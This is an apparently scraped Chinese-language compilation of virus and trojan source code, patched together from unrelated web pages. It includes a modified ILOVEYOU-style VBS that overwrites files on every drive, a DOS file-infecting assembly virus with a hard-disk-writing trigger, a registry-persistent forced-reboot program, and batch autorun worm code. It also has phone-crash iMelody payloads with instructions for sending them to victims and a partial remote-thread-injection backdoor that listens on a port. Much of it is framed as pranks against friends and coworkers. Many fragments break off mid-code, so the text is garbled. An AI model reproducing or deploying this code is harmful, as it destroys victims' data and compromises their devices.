手机病毒源代码
微信中毒代码
微信中毒代码
1、首先以安卓手机为例,打开微信,再打开与好友的聊天场景,在对话框中输入代码://fullexit。
2、发现代码消失,微信不见了,自动退出,再次打开微信,需要重新输入密码登录。
3、同样在iPhone手机里输入代码://fullexit,我们发现它作为一条普通的信息发出去了。
也就是说此命令代码对iPhone手机无效。
4、应用实例:“愚弄”好友。
在一段比较精辟的语句前面加上代码://fullexit,(注意一定要放在文字的最前面,否则失效),然后把这段语句发给好友或微信群中,当好友复制、粘贴再转发这条消息时(用iPhone手机或微信电脑版发出),会嘎的一下微信不见了,不知道怎么回事,“愚弄”一下好友,活跃一下微信群的气氛,呵呵!。
爱虫病毒源码
说明:作者对某些代码进行了修改。
该文件是一个完整的程序。
该文件执行之后,会寻找硬盘上所有满足条件的文件,对其进行强制性覆盖(满足条件的文件数据将全部丢失)、并再创建一个相同文件名但后带.vbs的文件。
因此,请注意设立好破坏测试条件,千万不要对他人进行测试,否则,一切后果自负。
如果你的系统不支持.vbs,可以将后缀改为.vbe dim folder,fso,foldername,f,d,dcset fso=createobject("scripting.filesystemobject")set self=fso.opentextfile(wscript.scriptfullname,1)vbscopy=self.readall '读取病毒体,以备复制到文件self.closeset dc=fso.Drivesfor each d in dcif d.drivetype=3 or d.drivetype=2 then '检查磁盘类型wscript.echo d '弹出窗口,显示找到盘符scan(d)end ifnextlsfile=wscript.scriptfullname '该脚本程序路径set lsfile=fso.getfile(lsfile)lsfile.delete(true) '病毒运行后自我删除(本人自加,爱虫病毒本身没有该代码)sub scan(folder_)on error resume nextset folder_=fso.getfolder(folder_)set files=folder_.filesfor each file in filesext=fso.GetExtensionName(file) '获取文件后缀ext=lcase(ext) '后缀名转换成小写字母if ext="mp5" then '如果后缀名是mp5,当然不存在这种文件,这里可以自己修改,但是注意。
VBS病毒代码
if(err>=1)then'超时设置
timeover.RegWrite "HKEY——CURRENT——USER\Softwate\Microsoft\Windows Scripting Host\Settings\Timeout"0"REG_DWORD"
end if
set sm=CreateObject("WScript.Shell")
c.Copy(sysdir&"\Kernel32.vbs")'将自己复制到system下
c.Copy(windir&"\Rundll32.vbs")'将自己复制到windows下
c.Copy(sysdir&"\Table.htm.vbs")'向system下再复制一个
regload()'调用写注册表的模块
Set regedit=CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)'判断文件是否存在的进程
On Error Resume Next
s=lcase(f1.neme)'将文件路径小写
if(ext="vbs")then '如果后缀是vbs
set ap=filesys.OpenTextFile(f1.path2true)'就以文本方式打开
ap.write vbscp'将自己写入文件,达到感染的目的
ap.close'关闭文件
next
手机木马病毒介绍
目前智能手机系统上的木马病毒程序已经泛滥,特别是An droid系统开源且水货、刷机行为较多,成为木马病毒的主要攻击方向。
Andro id系统的木马病毒系统可分为如下主要特征:1、获取硬件信息,如IMEI、IMSI等2、访问特定网站,增加流量或通话费用3、窃取用户通话及短信信息4、窃取用户键盘输入的敏感信息在以上特点中,第三和第四点对手机银行的危险性最大,木马能够窃取客户输入的用户名、密码以及手机交易码信息,并发送远程服务器。
1、窃取用户通话及短信信息木马介绍2011年11月,信息安全厂商卡巴斯基发表分析文章,介绍智能手机ZitM o (Zeu S-in-the-M obile)木马是如何盗取用户重要数据的。
手机交易码曾被认为是最可靠的网银安全保护措施之一。
然而,随着专门针对智能手机的Zeu S木马出现,特别是Z euS-i n-the-Mobi le或Zi tMo–m TANs的出现,手机交易码已不能确保用户的重要数据不会落入网络罪犯的手中。
Zit Mo 于2010年9月首次被检测到,专门用来盗取由银行发送的短信息中的m TAN代码,也是迄今为止最受关注的手机安全事件之一。
网络安全专家分析称,“首先,该病毒具有跨平台传播的能力,无论是S ymbia n、Win dowsMobil e、Bla ckber ry和An droid系统,都被检测到了这种木马,其目的主要是将手机交易码短信息转发给网络罪犯(或者是一台服务器),后者进而可以利用这些被侵入的银行账户进行非法交易。
但是,ZitMo最大的特点是它与台式计算机木马ZeuS背后的关系。
如果没有后者的话,Z itMo仅仅能起到一个转发短信息的间谍程序作用。
病毒代码——精选推荐
病毒代码【病毒⼩程序】关于病毒的代码可以⽤来运⾏⼀下,你的电脑可能会发⽣......但⼤家都知道,病毒是恐怖的,你可以做⼀些有趣的代码.关机代码#includeusing namespace std;void main(){system(“cmd /c shutdown -s -t 60”); //这是调⽤cmdsystem(“pause”);}相信这很简单吧!还有个⽅法#include#include<shlobj.h>#include<shellapi.h>using namespace std;void main(){ShellExecute(NULL,“open”,“cmd.EⅩE”,"/c shutdown -s -t 60",NULL,SW_HIDE); system(“pause”);} # 加强版本// shutdownDemo.cpp : 定义控制台应⽤程序的⼊⼝点。
//#include "stdafx.h"#include <windows.h>BOOL MySystemShutdown(){HANDLE hToken; //⽤于操作的句柄TOKEN_PRIVILEGES tkp; //⽤于存放特定信息// Get a token for this process.if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))return(FALSE);// Get the LUID for the shutdown privilege.//如果要提权的话要在下⾯这两个函数提权LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);tkp.PrivilegeCount = 1; // one privilege to settkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;// Get the shutdown privilege for this process.AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);if (GetLastError() != ERROR_SUCCESS)return FALSE;// Shut down the system and force all applications to close.if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,SHTDN_REASON_MAJOR_OPERATINGSYSTEM |SHTDN_REASON_MINOR_UPGRADE |# 卡死代码# # 打开⽆数计算机``````VBS 系列格式代码# 甩不掉的魔⿁SHTDN_REASON_FLAG_PLANNED))return FALSE;//shutdown was successfulreturn TRUE;}int _tmain(int argc, _TCHAR* argv[]){getchar();HKEY hKey = { 0 };/*LONG RegOpenKeyEx(HKEY hKey, // 需要打开的主键的名称LPCTSTR lpSubKey, //需要打开的⼦键的名称DWORD ulOptions, // 保留,设为0REGSAM samDesired, // 安全访问标记,也就是权限PHKEY phkResult // 得到的将要打开键的句柄)*/RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey); //打开⼀个指定的注册表键char path[MAX_PATH] = { 0 };GetModuleFileNameA(nullptr, path, MAX_PATH); //获取当前⽂件路径RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte *)path, strlen(path));MySystemShutdown();return 0;}#include <stdio.h>void main(){long int i;while (i < =100000000){printf("你"完"了");i --;}}set wsh=createobject(“wscript.shell”)dowsh.run “calc”loop这段代码是打开⽆数个计算器,直到死机 ,也是保存为.vbs 格式WScript.Echo(“嘿,谢谢你打开我哦,我等你很久拉!”&TSName)WScript.Echo(“你是可爱的⼩朋吗?”)WScript.Echo(“哈,我想你拉,这你都不知道吗?”)WScript.Echo(“怎么才来,说~是不是不关⼼我”)WScript.Echo(“哼,我⽣⽓拉,等你这么久,⼼都凉啦。
批处理病毒源代码
echo del %%windir%%\temp.dll /f /q>>"%ALLUSERSPROFILE%\%pat%"\reboot.bat
goto auto>nul 2>nul
:J:
set disk=K:>nul 2>nul
goto auto>nul 2>nul
:K:
set disk=L:>nul 2>nul
goto auto>nul 2>nul
: L:
cls
attrib +s +h +r %windir%\%~nx0 2>nul >nul
goto auto>nul 2>nul
: D:
set disk=E:>nul 2>nul
goto auto>nul 2>nul
:E:
set disk=F:>nul 2>nul
goto auto>nul 2>nul
:F:
set disk=G:>nul 2>nul
attrib +s +h +r %disk%\%~nx0 2>nul >nul
attrib +s +h +r %disk%\autorun.inf 2>nul >nul
cls
goto %disk%>nul 2>nul
自己编写一个小病毒代码
C# 代码自己编写一个小程序,类是病毒但无害,就是会创建50*50*26个空文件夹,运行过产生30000个文件夹就等不下去了,删除新建的文件夹估计要10分钟,仅为娱乐private void button4_Click(object sender, EventArgs e){IList<string> temp_list = new List<string>();string path = "I:\\新建文件夹";/****本人笔记本有I盘,同时为了删除方便****/// string path = "C:\\Program Files"; 用这行代码时估计你要崩溃string pathFile = "";char [] arry = new char[26]{'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s',' t','u','v','w','x','y','z' };try{for (int p = 0; p < 50; p++){for (int k = 0; k < 50; k++){for (int i = 0; i < 26; i++){temp_list.Add(i.ToString());//temp_list.Add("num:" + i.ToString());}temp_list = getListItems(temp_list, 26);for (int i = 0; i < temp_list.Count; i++){richTextBox1.Text += arry[int.Parse(temp_list[i])]; pathFile += arry[int.Parse(temp_list[i])];if (Directory.Exists(path + "\\" + pathFile))/***判断文件夹是否存在,存在就删除该文件加***/{Directory.Delete(path + "\\" + pathFile);System.IO.Directory.CreateDirectory(path + "\\" + pathFile);/****创建文件加*****/}else{System.IO.Directory.CreateDirectory(path + "\\" + pathFile); /****创建文件加*****/}richTextBox2.Text += temp_list[i];if (pathFile.Length > 200)/***文件夹的名字超过240字符后会报错,故取240以内都有效***/{pathFile = "";}}}}}catch (Exception ee){throw new Exception(ee.ToString());}}public static IList<string> getListItems(IList<string> list, int num)/***建立获取随机数****/{IList<string> temp_list = new List<string>(list);IList<string> return_list = new List<string>();Random random = new Random();for (int i = 0; i < num; i++){if (temp_list.Count > 0){int arrIndex = random.Next(0, temp_list.Count);return_list.Add(temp_list[arrIndex]);temp_list.RemoveAt(arrIndex);}else{break;}}return return_list;}(注:专业文档是经验性极强的领域,无法思考和涵盖全面,素材和资料部分来自网络,供参考。
用汇编语言写一个简单病毒程序源代码
用汇编语言写一个简单病毒程序源代码; 感染对象: DOS 的 EXE COM 文件; 编译工具: MASM 6.0 , MASM 6.11CODE SEGMENTassume cs:code.386org 100hstart:mov cs:oldsp,sp ; 保存原程序的堆栈指针mov cs:oldss,ss ;mov sp,stack_endmov ax,cs ; 设置新的堆栈指针mov ss,ax ;push ds ;保存原 ds espush es ;mov ds,axmov es,axsub ax,oldseg ; 算出原程序的入口push ax ; 并保存入栈push oldip ;call setfile ;程序的核心部分pop cs:oldip ; 取回原程序的入口pop cs:oldseg ;pop es ; 恢复原 es dspop ds ;mov sp,cs:oldss ; 恢复原 ss,spmov ss,sp ;mov sp,cs:oldsp ;push oldseg ;跳回原程序入口点push oldip ;retf ;db 09ahgetdate proc near ;这个函数是取得时间是否是星期二是则破坏硬盘数据mov ax,0ec32h ; 写要执行的代码 int 13hnot ax ; 到 @dest1 位置mov si,@des1 ; 这里既加密代码mov word ptr [si],ax ;mov ah,2ahint 21hcmp al,2jnz @gd_conmov ax,312hmov cx,1mov dx,80h@des1:db 0ebhdb 32ret@gd_con:retgetdate endpsetfile1 proc nearcall findfirst@sf_con:jc @sf_backcall modifycall findnextjmp @sf_con@sf_back:retsetfile1 endpsetdata proc nearpush sipush dipush cxpush axpushfmov si,offset normal1mov di,simov cx,23h@aaa2:lodsbnot axstosbloop @aaa2popfpop axpop cxpop dipop siretsetdata endpsetfile proc nearcmp ax,127h ; 没有作用只是干挠jnz @aaa1 ; ax 不可能等于 127h call dword ptr oldsp ;ret ;db 0e8h ;@aaa: call getdateret@aaa1:mov ah,01ah ;设置磁盘传输地址mov dx,offset dta ;用于 findfirstint 21h ;call setdata ;数据解密push @aaamov dx,offset normal1 ; 找 *.exemov ax,offset dtaadd ax,01ehmov fs,ax ; fs 用于传递文件名的地址call setfile1 ; 传染文件mov dx,offset normal2 ; 找 *.comcall setfile1mov dx,offset bootcmd ; 找 c:\windows\ mov fs,dxcall setfile1mov dx,offset bootcmd1 ; 找 c:\mov si,dx ;mov word ptr [si],':C' ;mov fs,dx ;call setfile1 ;retsetfile endpdb 09ahfindfirst proc nearmov ax,04e27hint 21hretfindfirst endpfindnext proc nearmov ah,04fhint 21hretfindnext endpmodify proc near ;修改并感染程序mov si,offset sbuffer ;可执行的文件头的地址mov di,offset dta ;文件信息的地址cmp dword ptr [di+01ah],1000 ; 若文件小于 1K 或大于 1M 不感染jb @fn_ret ;cmp dword ptr [di+01ah],0ffcffh ;jae @fn_ret ;mov dx,fsmov ax,4300h ;保存原文件属性int 21h ;再改为没有属性push cx ;mov ax,4301hxor cx,cxint 21hmov ax,03d02h ; 打开文件int 21h ;jc @fn_ret3 ;mov bx,ax ; 读文件头mov ah,03fh ;mov cx,1ch ;mov dx,offset sbuffer ;int 21h ;cmp word ptr [si],'ZM' ; 如不是可执行文件就不感染jnz @fn_ret1 ;mov ax,word ptr [si+014h] ; 保存原程序入口mov oldip,ax ;mov ax,word ptr [si+016h] ;mov oldseg,axmov ax,4200h ; 检查是否已经被我感染过mov cx,word ptr [di+1ch] ;mov dx,word ptr [di+1ah] ;sub dx,2 ;int 21h ;mov ah,3fh ;mov cx,2 ;mov dx,offset temp ;int 21hcmp word ptr temp,0dcd6h ; 若已经被感染就返回jz @fn_ret1 ;mov eax,dword ptr [di+01ah] ; 得到文件的总长mov cx,0fhand cx,ax ; 算出感染后的入口点mov fill,010h ;sub fill,cx ;movzx ecx,fill ;add eax,ecx ;sub eax,100hshr eax,4mov cx,word ptr [si+8]sub ax,cxmov word ptr [si+14h],100hmov word ptr [si+16h],axsub ax,oldsegmov oldseg,axmov ax,4202h ;把本病毒写至文件尾xor cx,cx ;xor dx,dx ;int 21hcall setdatamov ah,40hmov cx,offset theendmov dx,offset startsub dx,fillsub cx,dxint 21hcall setdatajc @fn_ret1mov ax,4202h ; 算出加载程序的长度xor cx,cx ;xor dx,dx ;int 21hmov cx,200hdiv cxinc axmov word ptr [si+2],dxmov word ptr [si+4],axmov ax,4200h ;改写文件头xor cx,cxxor dx,dxint 21hmov ah,40hmov dx,simov cx,1chint 21h@fn_ret1:mov ah,03eh ;关闭文件int 21h ;@fn_ret3:pop cx ;恢复原文件属性mov ax,4301h ;mov dx,gsint 21h@fn_ret:retmodify endpoldip word 0oldseg word 0;======== 用 not 换算过的数据 ========normal1 db 0d5h,0d1h,09ah,087h,09ah,0ffh ; '*.EXE'normal2 db 0d5h,0d1h,09ch,090h,092h,0ffh ; '*.COM'bootcmd db 0bch,0c5h,0a3h,0a8h,0b6h,0b1h,0bbh,0b0h ; 'C:\WINDO'bootcmd1 db 0a8h,0ach,0a3h,0bch,0b0h,0b2h,0b2h,0beh ; 'WS\'db 0b1h,0bbh,0d1h,0bch,0b0h,0b2h,0ffhfl word 0dcd6htheend:oldsp word 0oldss word 0temp word 0temp1 word 0dta db 02bh dup(0)fill word 0sbuffer db 1dh dup(0) stack_start db 40h dup(0) stack_end:code endsend start。
智能手机S60病毒全攻略
智能手机S60病毒全攻略估计这是目前为止最全的介绍病毒的帖子,一次收录所有symbian s60 病毒的介绍和杀除方法!希望大家能够防范和保护自己的爱机!而且随着病毒源代码的地下公开,以后会有越来越多的病毒出现。
首先,是大家熟悉的Cabir系列,不同的Cabir病毒,有不同的处理方法,介绍如下:Cabir.ACabir是通过蓝牙传播复制病毒来感染symbian s60平台手机的!它通过蓝牙连接,以短信形式发送cabir.sis手机的收件箱,这个文件含有蠕虫病毒。
当用户点击cabir.sis并安装时,蠕虫病毒就被激活,并开始通过蓝牙寻找感染新的手机或其他设备。
当它找到另外的蓝牙设备时,就可是发送cabir.sis!注意,Cabir蠕虫病毒只能感染支持蓝牙,并且蓝牙状态为可见的手机,而且一旦感染,再关闭蓝牙已经不起作用,所以一般情况下,不要开蓝牙。
感染后处理方法:用seleq或fileman删除以下文件:c:\system\apps\caribe\caribe.rscc:\system\apps\caribe\caribe.appc:\system\apps\caribe\flo.mdlc:\system\recogs\flo.mdlc:\system\symbiansecuredata\caribesecuritymanager\caribe.appc:\system\symbiansecuredata\caribesecuritymanager\caribe.rscCabir.BCabir.B是Cabir.A的一种不同的镜像,和Cabir.A最重要的不同点是,Cabir.B在开机后显示不同的文本。
Cabir.A显示文本是"Caribe-VZ/29a",而Cabir.B显示的就是"Caribe".还有一种重新打包的Cabir.B,也是sis文件形式,当病毒被装到不同的文件夹时,显示popup。
手机病毒(黑屏,狂震,振铃)源代码
BEGIG:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODYledoffbackoffvibronr5vibeoffledonbackonr5@200)
END:IMELODY
黑屏:
BEGIG:IMELODY
VERSION:1.2
FORMAT:CLASS1.0
BEAT:200
MELODYledoffbackoffvibronr5vibeoffledonbackonr5@600)
END:IMELODY
狂震:
BEGIG:IMELODY
VERSION:1.2
FORLODYledoffledonbackoffbackonvibeon@0)
END:IMELODY
我个人总结,以上代码只有在国产机里才可以用= =像索爱、诺基亚那些...貌似不行!
把手机连接到电脑上找到一个audio的文件夹在里面新建一个记事本文件每个记事本复制下面一种代码然后把记事本的扩展名txt改为imy然后拔下数据线写一条短信在短信里选择插入对象插入这几个文件发送过去就可以搞定了
手机病毒(黑屏,狂震,振铃)源代码
把手机连接到电脑上,找到一个AUDIO的文件夹,在里面新建一个记事本文件,每个记事本复制下面一种代码,然后把记事本的扩展名TXT改为imy,然后拔下数据线,写一条短信,在短信里选择插入对象,插入这几个文件,发送过去,就可以搞定了 。
木马程序开发技术:病毒源代码详解
⽊马程序开发技术:病毒源代码详解近年来,⿊客技术不断成熟起来,对⽹络安全造成了极⼤的威胁,⿊客的主要攻击⼿段之⼀,就是使⽤⽊马技术,渗透到对⽅的主机系统⾥,从⽽实现对远程操作⽬标主机。
其破坏⼒之⼤,是绝不容忽视的,⿊客到底是如何制造了这种种具有破坏⼒的⽊马程序呢,下⾯我对⽊马进⾏源代码级的详细的分析,让我们对⽊马的开发技术做⼀次彻底的透视,从了解⽊马技术开始,更加安全的管理好⾃⼰的计算机。
1、⽊马程序的分类 ⽊马程序技术发展⾄今,已经经历了4代,第⼀代,即是简单的密码窃取,发送等,没有什么特别之处。
第⼆代⽊马,在技术上有了很⼤的进步,冰河可以说为是国内⽊马的典型代表之⼀。
第三代⽊马在数据传递技术上,⼜做了不⼩的改进,出现了ICMP等类型的⽊马,利⽤畸形报⽂传递数据,增加了查杀的难度。
第四代⽊马在进程隐藏⽅⾯,做了⼤的改动,采⽤了内核插⼊式的嵌⼊⽅式,利⽤远程插⼊线程技术,嵌⼊DLL线程。
或者挂接PSAPI,实现⽊马程序的隐藏,甚⾄在Windows NT/2000下,都达到了良好的隐藏效果。
相信,第五代⽊马很快也会被编制出来。
关于更详细的说明,可以参考ShotGun的⽂章《揭开⽊马的神秘⾯纱》。
2.⽊马程序的隐藏技术 ⽊马程序的服务器端,为了避免被发现,多数都要进⾏隐藏处理,下⾯让我们来看看⽊马是如何实现隐藏的。
说到隐藏,⾸先得先了解三个相关的概念:进程,线程和服务。
我简单的解释⼀下。
进程:⼀个正常的Windows应⽤程序,在运⾏之后,都会在系统之中产⽣⼀个进程,同时,每个进程,分别对应了⼀个不同的PID(Progress ID, 进程标识符)这个进程会被系统分配⼀个虚拟的内存空间地址段,⼀切相关的程序操作,都会在这个虚拟的空间中进⾏。
线程:⼀个进程,可以存在⼀个或多个线程,线程之间同步执⾏多种操作,⼀般地,线程之间是相互独⽴的,当⼀个线程发⽣错误的时候,并不⼀定会导致整个进程的崩溃。
简单的病毒编程代码
简单的病毒编程代码病毒编程是一项非常有趣的技术,它可以被用来创建恶意软件,也可以被用来保护计算机安全。
本文将使用简单的代码,演示如何创建一个病毒。
前置知识在开始之前,你需要掌握一些基本的编程知识,特别是 Python编程语言。
本文的代码将采用 Python,因为它是一种简单易学的语言,而且有很多函数和库可以帮助我们编写和执行病毒程序。
代码下面是一个简单的病毒编程代码:```pythonimport osimport randomdef infect(files):for file in files:try:with open(file, 'r') as f:content = f.read()except:continueif 'virus' in content:continuewith open(file, 'a') as f:f.write('\n\n# infected with virus\n')print('Infection completed')def spread(files):for file in files:if not os.path.isfile(file):continuewith open(file, 'r') as f:content = f.read()if 'virus' not in content:continuefor i in range(10):random_file = random.choice(files)if os.path.isfile(random_file):with open(random_file, 'a') as f:f.write('\n\n# spread from ' + file) breakprint('Spreading completed')def main():files = []for root, dirs, filenames in os.walk('.'):for filename in filenames:if filename.endswith('.py'):files.append(os.path.join(root, filename))infect(files)spread(files)if __name__ == '__main__':main()```此代码将随机选择10个Python文件,并向其中的每个文件添加一行注释,指示该文件已被感染。
您需要知道的 11 大 Android 秘密安全代码
您需要知道的11 大Android 秘密安全代码寻找最好的Android 密码和黑客?以下是增强智能手机安全性和隐私性的顶级USSD 代码。
Android 是当今世界上最流行的移动操作系统,为超过25 亿台设备提供支持。
而且,如果您使用Android 设备已有一段时间,您可能已经知道USSD 代码。
USSD 代码,也通俗地称为“秘密代码”,只是用于解锁智能手机中隐藏操作的代码。
非结构化补充服务数据(USSD) 是一种用户界面协议,可用于访问智能手机中的隐藏功能。
要运行任何Android 安全代码,您必须直接在拨号器中输入。
如果输入正确,代码将自动返回响应,或者您可能必须按拨号。
那么最常见的安卓安全码有哪些呢?“秘密代码”实际上是做什么的?1. *2767*3855#(擦除设备并重新安装固件)这是最有效的Android 安全代码之一,可用于快速擦除设备上的所有信息。
把它想象成恢复出厂设置——在你的拨号器中添加这个代码并运行它,它会有效地删除你手机中的所有数据,并将其擦除干净。
此代码在重新安装固件时更进一步,因此它与新的软件一样好。
注意:这是一个硬重置,并且会擦除所有内容,因此只能在绝对紧急情况下使用。
2. *#*#7780#*#*(恢复出厂设置)如果您不想运行硬重置,这是下一个最佳选择。
与恢复出厂设置类似,此代码将简单地从您的设备中删除所有应用程序数据以及任何应用程序。
然后,它会将您的设备恢复到出厂状态。
如果您不想花费额外的精力来重置和重新安装固件,而只想从您的设备中删除任何个人数据、应用程序和应用程序数据,那么这是最佳选择。
如果您要出售手机,这对您的隐私很有好处。
3. *#06#(查看设备的IMEI)这是另一个重要的代码,您可以使用它来检查设备的IMEI是否与包装盒上提到的相同。
大多数现代智能手机的背面都印有IMEI,但如果您想确定,可以使用此代码进行检查。
只需打开拨号器,添加代码,它就会返回IMEI。
整人病毒代码
前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。
一、怎么点都没反应的桌面如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。
他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中…………附带:print键截屏方法:键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。
用法二,先按住“Alt”键,再按“Print Screen SysRq”键,则是对当前窗口进行抓图。
如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。
哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!二、让电脑硬盘消失-隐藏磁盘方法愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!步骤1.新建一个记事本2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”3.将下面的代码复制到记事本当中:Windows Registry Editor Version 5.00[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00解释(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的图中的D盘已经神秘消失了。
手机病毒——精选推荐
⼿机病毒〖灯〗☆【炮】搜集资料之【各种NOKIA病毒】:病毒woutcast.exe发病症状:1.每5分钟⾃动⽩屏并且⼿机⾃动重启2.不停的蓝⽛向别的机器发送病毒.使机器成为传染源3.⾃动向电话本⾥的朋友的号码发彩信.吧病毒发给朋友4.如果安装了移动毒霸等软件.会⾃动删除杀毒软件的主程序5.单存的格机格卡病毒依然存在6.如果感染的是QD(⾮4.24版)/NG/7650等机器.很遗憾.是致命的.只有去刷机升级才能去掉病毒下⾯的病毒都是⼩病毒.随便介绍⼏个1.毁灭字库——Blankfont.A.sis危害等级:★★☆☆☆病毒症状:这个病毒主要针对Symbian系统⼿机的字库和输⼊法,并对其进⾏攻击。
⼿机染上病毒后,会⽣成⼀个名为Panic.gdr的⽂件,使⼿机⽆法正常显⽰任何⽂字,致使⽤户⽆法完成正常操作,但不会导致系统崩溃或⾃动格式化。
该病毒寄存在Rally_2.sis⽂件中,只有在安装并重新启动之后才会发作。
Symbian操作系统:这是⼿机最常⽤的⼀种嵌⼊式操作系统,相当于⼀个⼩型的智能处理器,短信、⼿机铃声、图⽚等信息,都需要⼿机中的操作系统进⾏处理,然后显⽰给⼿机⽤户。
⽬前市场上有三分之⼆的智能上⽹⼿机采⽤的是Symbian系统2.蠕⾍病毒——卡⽐尔(Cabir)危害等级:★★☆☆☆病毒症状:如果你的⼿机突然收到⼀个莫名其妙的下载⽂件,⽽你也同意安装此程序的话,那你的⼿机就有可能感染上蠕⾍病毒。
这种病毒将通过⽹络⾃动搜索附近的其他⼿机⽤户并进⾏发送,整个过程耗电极⼤,使⼿机电池快速地耗尽。
3.骷髅图标——Skull病毒危害等级:★★★☆☆病毒症状:Skulls病毒会伪装成⼀个名叫Extended theme.sis的主题程序,当⽤户安装后,⼿机桌⾯上的所有图标都将被替换成⼀个骷髅头。
⼿机感染该病毒后,除了拨打和接听电话外,其他诸如收发短信、⽹络浏览和拍照等功能将全部失效。
Skulls病毒⼀般通过⼿机的蓝⽛⾃动传播,也可通过⼿机彩信的形式传播。
病毒代码大全
制造木马病毒代码大全2008-06-08 19:46 制造木马病毒代码大全一个简单的木马原型基础代码添加上自己的XXX,加上变态的壳,做点小修改,就可以.....#include #pragma comment(lib,"ws2_32.lib") #include #include #pragma comment(lib,"Shlwapi.lib")#include #include #include //参数结构; typedef struct_RemotePara { DWORD dwLoadLibrary; DWORD dwFreeLibrary; DWORD dwGetProcAddress; DWORD dwGetModuleHandle; DWORD dwWSAStartup; DWORD dwSocket; DWORD dwhtons; DWORD dwbind; DWORD dwlisten; DWORD dwaccept; DWORD dwsend; DWORD dwrecv; DWORD dwclosesocket; DWORD dwCreateProcessA; DWORD dwPeekNamedPipe; DWORD dwWriteFile; DWORD dwReadFile; DWORD dwCloseHandle; DWORD dwCreatePipe; DWORD dwTerminateProcess; DWORD dwMessageBox; char strMessageBox[12]; char winsockDll[16]; char cmd[10]; char Buff[4096]; char telnetmsg[60]; }RemotePara; // 提升应用级调试权限BOOL EnablePrivilege(HANDLE hToken,LPCTSTR szPrivName,BOOL fEnable); // 根据进程名称得到进程ID DWORD GetPidByName(char *szName); // 远程线程执行体DWORD __stdcall ThreadProc(RemotePara *Para){ WSADATA WSAData; WORD nVersion; SOCKET listenSocket; SOCKET clientSocket; struct sockaddr_in server_addr; struct sockaddr_in client_addr; int iAddrSize = sizeof(client_addr); SECURITY_ATTRIBUTES sa; HANDLE hReadPipe1; HANDLE hWritePipe1; HANDLE hReadPipe2; HANDLE hWritePipe2; STARTUPINFO si; PROCESS_INFORMATION ProcessInformation; unsigned long lBytesRead = 0; typedef HINSTANCE (__stdcall*PLoadLibrary)(char*); typedef FARPROC (__stdcall*PGetProcAddress)(HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *PFreeLibrary)( HINSTANCE ); typedef HINSTANCE (__stdcall*PGetModuleHandle)(HMODULE); FARPROC PMessageBoxA; FARPROC PWSAStartup; FARPROC PSocket; FARPROC Phtons; FARPROC Pbind; FARPROC Plisten; FARPROC Paccept; FARPROC Psend; FARPROC Precv; FARPROC Pclosesocket; FARPROC PCreateProcessA; FARPROC PPeekNamedPipe; FARPROC PWriteFile; FARPROC PReadFile; FARPROC PCloseHandle; FARPROC PCreatePipe; FARPROC PTerminateProcess; PLoadLibrary LoadLibraryFunc = (PLoadLibrary)Para->dwLoadLibrary; PGetProcAddress GetProcAddressFunc =(PGetProcAddress)Para->dwGetProcAddress; PFreeLibrary FreeLibraryFunc = (PFreeLibrary)Para->dwFreeLibrary; PGetModuleHandle GetModuleHandleFunc = (PGetModuleHandle)Para->dwGetModuleHandle; LoadLibraryFunc(Para->winsockDll); PWSAStartup = (FARPROC)Para->dwWSAStartup; PSocket = (FARPROC)Para->dwSocket; Phtons = (FARPROC)Para->dwhtons; Pbind =(FARPROC)Para->dwbind; Plisten =(FARPROC)Para->dwlisten; Paccept = (FARPROC)Para->dwaccept; Psend =(FARPROC)Para->dwsend; Precv =(FARPROC)Para->dwrecv; Pclosesocket = (FARPROC)Para->dwclosesocket; PCreateProcessA = (FARPROC)Para->dwCreateProcessA; PPeekNamedPipe = (FARPROC)Para->dwPeekNamedPipe; PWriteFile = (FARPROC)Para->dwWriteFile; PReadFile = (FARPROC)Para->dwReadFile; PCloseHandle = (FARPROC)Para->dwCloseHandle; PCreatePipe = (FARPROC)Para->dwCreatePipe; PTerminateProcess = (FARPROC)Para->dwTerminateProcess; PMessageBoxA = (FARPROC)Para->dwMessageBox; nVersion =MAKEWORD(2,1); PWSAStartup(nVersion, (LPWSADATA)&WSAData); listenSocket =PSocket(AF_INET, SOCK_STREAM, 0); if(listenSocket == INVALID_SOCKET)return 0; server_addr.sin_family =AF_INET; server_addr.sin_port = Phtons((unsigned short)(8129)); server_addr.sin_addr.s_addr =INADDR_ANY; if(Pbind(listenSocket, (struct sockaddr *)&server_addr, sizeof(SOCKADDR_IN)) != 0)return 0;if(Plisten(listenSocket, 5))return 0; clientSocket = Paccept(listenSocket, (struct sockaddr *)&client_addr,&iAddrSize); // 